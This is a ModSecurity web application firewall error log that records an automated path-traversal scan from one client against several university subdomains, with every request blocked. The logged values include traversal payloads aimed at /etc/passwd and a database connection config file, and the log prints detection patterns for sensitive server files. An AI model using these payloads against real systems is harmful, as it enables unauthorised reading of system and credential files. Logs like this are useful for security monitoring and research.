[Tue Aug 29 11:45:25.397319 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO135cCo-f0AAAdQ3z0AAAAV"]
[Tue Aug 29 11:45:25.401033 2023] [:error] [pid 2153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:style: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135cCo-f0AAAhpwQsAAAAm"]
[Tue Aug 29 11:45:25.401036 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:style: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135cCo-f0AAAe3@LMAAAAA"]
[Tue Aug 29 11:45:25.410684 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO135cCo-f0AAAhgoHwAAAAb"]
[Tue Aug 29 11:45:25.411251 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:style: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135cCo-f0AAARphLkAAAAU"]
[Tue Aug 29 11:45:25.422880 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/log/view"] [unique_id "ZO135cCo-f0AAAh4DZIAAAA2"]
[Tue Aug 29 11:45:25.427057 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:style: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135cCo-f0AAAhhcxgAAAAd"]
[Tue Aug 29 11:45:26.379326 2023] [:error] [pid 2108] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/log/view"] [unique_id "ZO135sCo-f0AAAg8a9UAAAAK"]
[Tue Aug 29 11:45:26.455243 2023] [:error] [pid 2153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/log/view"] [unique_id "ZO135sCo-f0AAAhpwRAAAAAm"]
[Tue Aug 29 11:45:26.462908 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:script: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135sCo-f0AAAhrqIQAAAAo"]
[Tue Aug 29 11:45:26.464609 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/log/view"] [unique_id "ZO135sCo-f0AAAfSWkEAAAAB"]
[Tue Aug 29 11:45:26.476930 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO135sCo-f0AAARphLsAAAAU"]
[Tue Aug 29 11:45:27.360013 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO1358Co-f0AAAdQ30MAAAAV"]
[Tue Aug 29 11:45:27.378119 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/log/view"] [unique_id "ZO1358Co-f0AAARphL0AAAAU"]
[Tue Aug 29 11:45:27.383992 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO1358Co-f0AAAhlz5IAAAAi"]
[Tue Aug 29 11:45:27.389415 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:style: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO1358Co-f0AAAe3@LgAAAAA"]
[Tue Aug 29 11:45:27.394991 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO1358Co-f0AAAhxwn0AAAAv"]
[Tue Aug 29 11:45:27.401661 2023] [:error] [pid 2153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO1358Co-f0AAAhpwRUAAAAm"]
[Tue Aug 29 11:45:28.410762 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/log/view"] [unique_id "ZO136MCo-f0AAAdQ30UAAAAV"]
[Tue Aug 29 11:45:28.411880 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/log/view"] [unique_id "ZO136MCo-f0AAAfSWkYAAAAB"]
[Tue Aug 29 11:45:28.415704 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/log/view"] [unique_id "ZO136MCo-f0AAAhrqIsAAAAo"]
[Tue Aug 29 11:45:28.433315 2023] [:error] [pid 2153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO136MCo-f0AAAhpwRgAAAAm"]
[Tue Aug 29 11:45:28.437157 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/log/view"] [unique_id "ZO136MCo-f0AAAhT3yQAAAAD"]
[Tue Aug 29 11:45:29.368663 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language_S. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:Language_S: ../../Data/CONFIG/CasDbCnn.dat"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/casmain.xgi"] [unique_id "ZO136cCo-f0AAAgzyUwAAAAF"]
[Tue Aug 29 11:45:29.384444 2023] [:error] [pid 2148] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language_S. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:Language_S: ../../Data/CONFIG/CasDbCnn.dat"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/casmain.xgi"] [unique_id "ZO136cCo-f0AAAhkLgcAAAAh"]
[Tue Aug 29 11:45:29.385032 2023] [:error] [pid 2167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language_S. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:Language_S: ../../Data/CONFIG/CasDbCnn.dat"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/casmain.xgi"] [unique_id "ZO136cCo-f0AAAh3f8EAAAA1"]
[Tue Aug 29 11:45:29.391965 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO136cCo-f0AAAgzyU0AAAAF"]
[Tue Aug 29 11:45:29.407551 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language_S. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:Language_S: ../../Data/CONFIG/CasDbCnn.dat"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/casmain.xgi"] [unique_id "ZO136cCo-f0AAAhrqI4AAAAo"]
[Tue Aug 29 11:45:29.412287 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language_S. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:Language_S: ../../Data/CONFIG/CasDbCnn.dat"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/casmain.xgi"] [unique_id "ZO136cCo-f0AAAhT3ycAAAAD"]
[Tue Aug 29 11:45:29.415234 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/log/view"] [unique_id "ZO136cCo-f0AAAhhcxsAAAAd"]
[Tue Aug 29 11:45:30.372959 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/systemController/showOrDownByurl.do"] [unique_id "ZO136sCo-f0AAAhxwoIAAAAv"]
[Tue Aug 29 11:45:30.374814 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/log/view"] [unique_id "ZO136sCo-f0AAAgzyVAAAAAF"]
[Tue Aug 29 11:45:30.378645 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/systemController/showOrDownByurl.do"] [unique_id "ZO136sCo-f0AAAhoHM8AAAAl"]
[Tue Aug 29 11:45:30.384036 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/systemController/showOrDownByurl.do"] [unique_id "ZO136sCo-f0AAAfiYvoAAAAg"]
[Tue Aug 29 11:45:30.387098 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/systemController/showOrDownByurl.do"] [unique_id "ZO136sCo-f0AAAhgoIMAAAAb"]
[Tue Aug 29 11:45:30.393328 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/systemController/showOrDownByurl.do"] [unique_id "ZO136sCo-f0AAAhxwoMAAAAv"]
[Tue Aug 29 11:45:30.415486 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language_S. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:Language_S: ../../Data/CONFIG/CasDbCnn.dat"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/casmain.xgi"] [unique_id "ZO136sCo-f0AAAgzyVIAAAAF"]
[Tue Aug 29 11:45:30.423780 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:docDownloadPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:docDownloadPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/WealthT24/GetImage"] [unique_id "ZO136sCo-f0AAAhrqJIAAAAo"]
[Tue Aug 29 11:45:31.352613 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:docDownloadPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:docDownloadPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/WealthT24/GetImage"] [unique_id "ZO1368Co-f0AAAhgoIYAAAAb"]
[Tue Aug 29 11:45:31.360581 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:docDownloadPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:docDownloadPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/WealthT24/GetImage"] [unique_id "ZO1368Co-f0AAAh13xIAAAAz"]
[Tue Aug 29 11:45:31.370467 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:docDownloadPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:docDownloadPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/WealthT24/GetImage"] [unique_id "ZO1368Co-f0AAAhBSA8AAAAX"]
